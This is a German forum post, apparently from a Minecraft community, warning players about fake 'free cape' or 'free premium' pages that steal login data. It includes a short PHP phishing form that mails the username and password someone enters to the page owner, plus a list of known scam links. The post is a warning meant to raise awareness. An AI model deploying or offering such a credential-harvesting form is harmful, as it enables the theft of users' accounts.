Hey,
in letzter Zeit sind mir des Öfteren gewisse Personen in der Gommunity aufgefallen, welche Texte wie "Holt euch ein gratis MineconCape hier --> xyz.xyz <-- Zum öffnen einfach klicken!" geschickt haben.
Wenn man darauf klickt, kommt man auf zum Beispiel so eine Seite:
Anders werben diese auch mit "Gratis Premium hier", oder "Free Minecraft Accounts" etc.
Das sind sogenannte "Keylogger", oder "Scam"-Seiten. Diese Formulare sind reine Tarnung, denn sie können deine Minecraft-Daten überhaupt nicht überprüfen!
Das einzige was sie machen ist, die Informationen die du eingegeben hast, dem Besitzer der Seite auf direktem Wege zu übermitteln.
Jetzt hat er eure Daten und wird sie entweder verkaufen, oder zum hacken verwenden.
Also bitte seid vorsichtig! Heutzutage kann jeder so einen Code innerhalb einer Minute schreiben. In meinem Beispiel werden die Daten per Mail versendet:
(Code ist mit Absicht so simpel gehalten und soll veranschaulichen, wie einfach es ist, eingegebenen Daten per Mail zu versenden.)
Ich hoffe ich konnte wenigstens ein paar Leuten die Augen öffnen.
- benbas39
-----------------------------------------------
Sammelliste aller bekannten Links:
- GRATISCAPE.XYZ
in letzter Zeit sind mir des Öfteren gewisse Personen in der Gommunity aufgefallen, welche Texte wie "Holt euch ein gratis MineconCape hier --> xyz.xyz <-- Zum öffnen einfach klicken!" geschickt haben.
Wenn man darauf klickt, kommt man auf zum Beispiel so eine Seite:
Anders werben diese auch mit "Gratis Premium hier", oder "Free Minecraft Accounts" etc.
Das sind sogenannte "Keylogger", oder "Scam"-Seiten. Diese Formulare sind reine Tarnung, denn sie können deine Minecraft-Daten überhaupt nicht überprüfen!
Das einzige was sie machen ist, die Informationen die du eingegeben hast, dem Besitzer der Seite auf direktem Wege zu übermitteln.
Jetzt hat er eure Daten und wird sie entweder verkaufen, oder zum hacken verwenden.
Also bitte seid vorsichtig! Heutzutage kann jeder so einen Code innerhalb einer Minute schreiben. In meinem Beispiel werden die Daten per Mail versendet:
PHP:
<html>
<body>
<form method="post">
<input type="text" name="username" placeholder="Minecraft-Username">
<input type="password" name="password" placeholder="Passwort">
<input type="submit" name="submit" value="Absenden">
</form>
</body>
</html>
<?php
if(isset($_POST["submit"])) {
mail("[email protected]", "Account", $_POST["username"]. $_POST["password"]);
}
?>
Ich hoffe ich konnte wenigstens ein paar Leuten die Augen öffnen.
- benbas39
-----------------------------------------------
Sammelliste aller bekannten Links:
- GRATISCAPE.XYZ
Zuletzt bearbeitet: